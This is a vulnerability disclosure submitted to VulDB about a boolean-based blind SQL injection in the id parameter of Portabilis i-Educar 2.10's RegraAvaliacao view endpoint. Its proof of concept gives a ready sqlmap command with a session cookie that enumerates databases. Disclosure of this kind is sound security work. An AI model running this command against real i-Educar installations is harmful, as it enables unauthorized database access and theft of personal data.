जमा करें #635801: Portabilis i-Educar 2.10 SQL Injectionजानकारी

शीर्षकPortabilis i-Educar 2.10 SQL Injection
विवरणSQL Injection (Boolean-Based) Vulnerability in id Parameter on /RegraAvaliacao/view?id=[id] Endpoint Summary A SQL Injection vulnerability was identified in the /module/RegraAvaliacao/view?id=[id] endpoint of the i-educar application, specifically in the id parameter. This vulnerability allows attackers to execute arbitrary SQL commands on the backend database, potentially compromising the confidentiality, integrity, and availability of application data. Details Vulnerable Endpoint: /module/RegraAvaliacao/view?id=[id] Parameter: id The application fails to properly validate and sanitize user input in the id parameter. As a result, attackers can inject crafted SQL payloads that are executed directly by the database. This could allow database enumeration, data exfiltration, modification, or denial of service via time-based delays. PoC Step by Step: Install sqlmap tool and type the command below: Payload: sqlmap -u "http://localhost:8086/module/RegraAvaliacao/view?id=1" -p id --cookie="i_educar_session=qEk2wbjxS5IbECJGqnIa0dbmIyI3XIsXqm3WSh6K" \ --dbms=PostgreSQL --technique=B --dbs --batch sqlmap begins to test a lot of SQLi in id parameter until find a boolean-based blind: image 1: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi6.png Some time after, sqlmap will list of available databases confirming that SQLi: image 2: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi7.png Still using sqlmap and discovering tables and columns it becomes possible to enumerate this information: image 3: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi8.png Impact Unauthorized data access: Reading sensitive information such as credentials, personal data, or configuration details Database enumeration: Extracting database schema, tables, and column details Data manipulation: Adding, modifying, or deleting database records. Denial of Service (DoS): Using time-based queries to impact system availability. Potential escalation to RCE: If combined with other vulnerabilities and specific database features. Finder Discovered by Karina Gante.
स्रोत⚠️ https://github.com/KarinaGante/KGSec/blob/main/CVEs/i-educar/12.md
उपयोगकर्ता
 karinagante (UID 88113)
सबमिशन16/08/2025 01:12 AM (10 महीनों पहले)
संयम27/08/2025 09:34 AM (11 days later)
स्थितिस्वीकृत
VulDB प्रविष्टि321551 [Portabilis i-Educar तक 2.10 /RegraAvaliacao/view पहचान SQL इंजेक्शन]
अंक20

पिछलासिंहावलोकनअगला

Interested in the pricing of exploits?

See the underground prices here!